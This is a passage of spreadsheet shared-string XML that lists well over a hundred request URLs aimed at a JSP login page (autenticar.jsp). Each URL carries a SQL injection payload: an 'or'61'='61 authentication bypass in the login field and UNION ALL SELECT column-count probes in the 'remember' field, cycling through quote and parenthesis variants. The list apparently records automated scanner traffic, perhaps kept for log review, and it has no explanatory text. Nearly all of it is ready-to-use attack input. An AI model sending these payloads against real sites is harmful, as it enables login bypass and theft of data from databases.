    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null--and"ejyv"like"ejyv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null--and"ntwn"like"ntwn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null--and"mgzb"like"mgzb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null--and"dykw"like"dykw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null--and"dxwp"like"dxwp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null--and"uuep"like"uuep&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null--and"kmmj"like"kmmj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect5537--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect5863,5863--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8024,8024,8024--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect4363,4363,4363,4363--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect782,782,782,782,782--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1509,1509,1509,1509,1509,1509--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1350,1350,1350,1350,1350,1350,1350--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2076,2076,2076,2076,2076,2076,2076,2076--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect455,455,455,455,455,455,455,455,455--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8995,8995,8995,8995,8995,8995,8995,8995,8995,8995--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2737--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6080,6080--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9124,9124,9124--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6615,6615,6615,6615--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1323,1323,1323,1323,1323--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7398,7398,7398,7398,7398,7398--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2200,2200,2200,2200,2200,2200,2200--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect341,341,341,341,341,341,341,341--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2375,2375,2375,2375,2375,2375,2375,2375,2375--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8040,8040,8040,8040,8040,8040,8040,8040,8040,8040--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect217--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8915,8915--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4216,4216,4216--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1937,1937,1937,1937--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7098,7098,7098,7098,7098--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2530,2530,2530,2530,2530,2530--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3719,3719,3719,3719,3719,3719,3719--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3207,3207,3207,3207,3207,3207,3207,3207--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9002,9002,9002,9002,9002,9002,9002,9002,9002--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9362,9362,9362,9362,9362,9362,9362,9362,9362,9362--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7278--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7307,7307--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2869,2869,2869--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4131,4131,4131,4131--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6458,6458,6458,6458,6458--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9943,9943,9943,9943,9943,9943--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6003,6003,6003,6003,6003,6003,6003--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9991,9991,9991,9991,9991,9991,9991,9991--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6143,6143,6143,6143,6143,6143,6143,6143,6143--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3492,3492,3492,3492,3492,3492,3492,3492,3492,3492--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2442--and(10=10&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect5382,5382--and(7496=7496&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9084,9084,9084--and(2931=2931&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6447,6447,6447,6447--and(87=87&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8669,8669,8669,8669,8669--and(2513=2513&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6764,6764,6764,6764,6764,6764--and(4874=4874&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1183,1183,1183,1183,1183,1183,1183--and(4967=4967&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect4501,4501,4501,4501,4501,4501,4501,4501--and(9380=9380&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6304,6304,6304,6304,6304,6304,6304,6304,6304--and(6927=6927&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8323,8323,8323,8323,8323,8323,8323,8323,8323,8323--and(8531=8531&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect2273--and((7038=7038&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect4770,4770--and((8058=8058&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect9992,9992,9992--and((4822=4822&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect7335,7335,7335,7335--and((9829=9829&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect1941,1941,1941,1941,1941--and((7711=7711&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect2743,2743,2743,2743,2743,2743--and((3283=3283&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect213,213,213,213,213,213,213--and((7046=7046&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect7305,7305,7305,7305,7305,7305,7305,7305--and((4136=4136&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect5241,5241,5241,5241,5241,5241,5241,5241,5241--and((5135=5135&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect2562,2562,2562,2562,2562,2562,2562,2562,2562,2562--and((5029=5029&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect3071--and(((8796=8796&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect4193,4193--and(((8313=8313&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect6736,6736,6736--and(((9892=9892&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect3165,3165,3165,3165--and(((1962=1962&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect6763,6763,6763,6763,6763--and(((1811=1811&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1903,1903,1903,1903,1903,1903--and(((631=631&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect3420,3420,3420,3420,3420,3420,3420--and(((6657=6657&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect6301,6301,6301,6301,6301,6301,6301,6301--and(((9373=9373&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect926,926,926,926,926,926,926,926,926--and(((7108=7108&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect4444,4444,4444,4444,4444,4444,4444,4444,4444,4444--and(((1365=1365&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect2022--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect5114,5114--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8398,8398,8398--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8386,8386,8386,8386--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect5127,5127,5127,5127,5127--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect5801,5801,5801,5801,5801,5801--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8918,8918,8918,8918,8918,8918,8918--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect5921,5921,5921,5921,5921,5921,5921,5921--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect271,271,271,271,271,271,271,271,271--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect6525,6525,6525,6525,6525,6525,6525,6525,6525,6525--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6630--and('mrsx'='mrsx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3098,3098--and('uhiv'='uhiv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3749,3749,3749--and('igjb'='igjb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2996,2996,2996,2996--and('fweh'='fweh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8607,8607,8607,8607,8607--and('jmyt'='jmyt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4938,4938,4938,4938,4938,4938--and('tygr'='tygr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6688,6688,6688,6688,6688,6688,6688--and('jykl'='jykl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4866,4866,4866,4866,4866,4866,4866,4866--and('fwad'='fwad&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2144,2144,2144,2144,2144,2144,2144,2144,2144--and('negj'='negj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7473,7473,7473,7473,7473,7473,7473,7473,7473,7473--and('qkby'='qkby&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4728--and(('vsen'='vsen&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3680,3680--and(('zbgx'='zbgx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9373,9373,9373--and(('clwt'='clwt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect5209,5209,5209,5209--and(('sdxe'='sdxe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4825,4825,4825,4825,4825--and(('hijo'='hijo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3139,3139,3139,3139,3139,3139--and(('yacp'='yacp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4589,4589,4589,4589,4589,4589,4589--and(('vjbc'='vjbc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3920,3920,3920,3920,3920,3920,3920,3920--and(('dysc'='dysc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9825,9825,9825,9825,9825,9825,9825,9825,9825--and(('truj'='truj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect272,272,272,272,272,272,272,272,272,272--and(('rzhr'='rzhr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2416--and((('ojlq'='ojlq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4675,4675--and((('ewxc'='ewxc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7443,7443,7443--and((('btcf'='btcf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4838,4838,4838,4838--and((('plnx'='plnx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8943,8943,8943,8943,8943--and((('wind'='wind&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8833,8833,8833,8833,8833,8833--and((('ayga'='ayga&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect338,338,338,338,338,338,338--and((('ylru'='ylru&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9891,9891,9891,9891,9891,9891,9891,9891--and((('hklx'='hklx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6407,6407,6407,6407,6407,6407,6407,6407,6407--and((('incv'='incv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6272,6272,6272,6272,6272,6272,6272,6272,6272,6272--and((('shoi'='shoi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8209--and'ghzg'='ghzg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5971,5971--and'hlaj'='hlaj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect726,726,726--and'nenv'='nenv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4398,4398,4398,4398--and'rcgh'='rcgh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4393,4393,4393,4393,4393--and'uhls'='uhls&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8213,8213,8213,8213,8213,8213--and'kzbv'='kzbv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7073,7073,7073,7073,7073,7073,7073--and'mjxk'='mjxk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7179,7179,7179,7179,7179,7179,7179,7179--and'smgb'='smgb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9554,9554,9554,9554,9554,9554,9554,9554,9554--and'hypn'='hypn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3196,3196,3196,3196,3196,3196,3196,3196,3196,3196--and'wlpu'='wlpu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5012--and('mriv'like'mriv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3031,3031--and('vurf'like'vurf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8683,8683,8683--and('sekh'like'sekh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2452,2452,2452,2452--and('opjt'like'opjt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3820,3820,3820,3820,3820--and('dyvr'like'dyvr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3343,3343,3343,3343,3343,3343--and('jgow'like'jgow&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2386,2386,2386,2386,2386,2386,2386--and('bsmw'like'bsmw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9895,9895,9895,9895,9895,9895,9895,9895--and('iudn'like'iudn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3383,3383,3383,3383,3383,3383,3383,3383,3383--and('zivl'like'zivl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5224,5224,5224,5224,5224,5224,5224,5224,5224,5224--and('fsqb'like'fsqb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect31--and(('asou'like'asou&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6054,6054--and(('nicc'like'nicc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4396,4396,4396--and(('gvbf'like'gvbf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2184,2184,2184,2184--and(('pnje'like'pnje&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7679,7679,7679,7679,7679--and(('nkxy'like'nkxy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1330,1330,1330,1330,1330,1330--and(('esth'like'esth&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect5469,5469,5469,5469,5469,5469,5469--and(('jlrc'like'jlrc&amp;modo=entrar</t>
  </si>
  <si>
